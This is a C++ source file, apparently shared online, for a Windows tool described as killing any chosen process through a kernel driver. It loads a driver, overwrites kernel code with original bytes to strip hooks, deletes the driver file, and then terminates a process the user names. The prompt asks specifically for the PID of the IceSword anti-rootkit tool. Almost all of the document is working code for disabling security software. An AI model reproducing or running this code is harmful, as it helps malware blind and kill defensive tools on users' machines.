inlinerehook.cpp

使用驱动技术可以关闭任意指定进程提升应用程序权限

// InlineReHOOK.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#include "NtQuerySystemInformation.h"
#include "Driver.h"
#include "resource.h"
#include "ObjectKill.h"
#include <stdio.h>
#include <conio.h>
#include <windows.h>
#include <winioctl.h>

//Link Device
#define IOCTL_GETADDR_CONTROL CTL_CODE(FILE_DEVICE_UNKNOWN,0x900,METHOD_BUFFERED,FILE_ANY_ACCESS)
#define IOCTL_INPUTCODE_CONTROL CTL_CODE(FILE_DEVICE_UNKNOWN,0x905,METHOD_BUFFERED,FILE_ANY_ACCESS)
#define IOCTL_INPUTADDR_CONTROL CTL_CODE(FILE_DEVICE_UNKNOWN,0x910,METHOD_BUFFERED,FILE_ANY_ACCESS)
#define IOCTL_INPUTBYTECOUNT_CONTROL CTL_CODE(FILE_DEVICE_UNKNOWN,0x915,METHOD_BUFFERED,FILE_ANY_ACCESS)

PUCHAR GetNTOriCode(ULONG NTBeginKrnlAddress,ULONG ByteCount);
void PatchHighMemory(LONG NtBeginAddr,LONG KrnlByteCount);

HANDLE hDevice;

int main(int argc, char* argv[])
{
	char	DeviceRet[25];
	DWORD	ReBytes;	//驱动数据交换返回值
	memset(DeviceRet,0,4);

	ULONG	NtAddr;
	ULONG	ByteCount;
	ULONG	BeginKrnlAddr;

	FreeSYS();
	hDevice = LoadDriver("C:\\KillIS.sys");

	memset(DeviceRet,0,4);
	DeviceIoControl(hDevice,IOCTL_GETADDR_CONTROL,0,0,DeviceRet,4,&ReBytes,NULL);

	NtAddr = atol(DeviceRet);

	BeginKrnlAddr = NtAddr;	//得到开始地址
	ByteCount =		10;		//获取更改代码的个数


	PatchHighMemory(NtAddr,ByteCount);

	UnloadDriver(hDevice);

	DeleteFile("C:\\KillIS.sys");

	LONG pid;
	printf("\n请输入冰刃的PID值:");
	scanf("%ld",&pid);
	ObjectKill(pid);

	return 0;
}

void PatchHighMemory(LONG NtBeginAddr,LONG KrnlByteCount)
{
	//device var
	char	DeviceRet[25];
	DWORD	ReBytes;	//驱动数据交换返回值
	memset(DeviceRet,0,4);

	PUCHAR	ByteWrite;
	PUCHAR	Code;

	printf("高位内存起始地址:0x%0.8X	数目:0x%0.8X\n",NtBeginAddr,KrnlByteCount);

	Code = GetNTOriCode(NtBeginAddr,KrnlByteCount);
	if(!Code)	exit(0);

	ByteWrite = Code;		//得到原始代码地址

	printf("开始反补丁");
	
	//输入要更改的BeginKrnlAddr数据
	DeviceIoControl(hDevice,IOCTL_INPUTADDR_CONTROL,&NtBeginAddr,sizeof(ULONG),0,0,&ReBytes,NULL);
	
	//输入要更改的ByteCount数据
	DeviceIoControl(hDevice,IOCTL_INPUTBYTECOUNT_CONTROL,&KrnlByteCount,sizeof(ULONG),0,0,&ReBytes,NULL);
	
	//输入要更改的Byte数据,并开始更改
	DeviceIoControl(hDevice,IOCTL_INPUTCODE_CONTROL,ByteWrite,KrnlByteCount*sizeof(UCHAR),0,0,&ReBytes,NULL);

	
}


PUCHAR GetNTOriCode(ULONG NTBeginKrnlAddress,ULONG ByteCount)
{
	HINSTANCE hNTDll;
	ULONG nRet;
	ULONG nQuerySize;
	ULONG Success;
	PSYSMODULELIST pModInfo = NULL;

	//获取NtQuerySystemInformation
	hNTDll = LoadLibrary("ntdll");
	NtQuerySystemInformation = (NTQUERYSYSTEMINFORMATION)GetProcAddress(hNTDll,"NtQuerySystemInformation");
	FreeLibrary(hNTDll);

	//获取内核模块
	Success  = NtQuerySystemInformation(SystemModuleInfo,NULL,0,&nQuerySize);
	pModInfo = (PSYSMODULELIST)malloc(nQuerySize);
	Success  = NtQuerySystemInformation(SystemModuleInfo,pModInfo,nQuerySize,&nRet);

	if( Success < 0 )
	{
		free( pModInfo );
		pModInfo = NULL;
	}	

	if( NTBeginKrnlAddress >= (ULONG)pModInfo->smi->Size+(ULONG)pModInfo->smi->Base )
		return 0;

	HMODULE hKernel;
	PUCHAR	buf;
	buf =  (PUCHAR)malloc(ByteCount);
	ULONG	FileOffset = NTBeginKrnlAddress-(ULONG)(pModInfo->smi->Base);
	hKernel = LoadLibraryEx(pModInfo->smi->ImageName+pModInfo->smi->ModuleNameOffset,0,DONT_RESOLVE_DLL_REFERENCES); 

	for(int c=0;c<ByteCount;c++)	//拷贝数据
		memcpy(buf+c,(PUCHAR)((ULONG)hKernel+FileOffset+c),sizeof(UCHAR));

	return buf;	//返回指针
}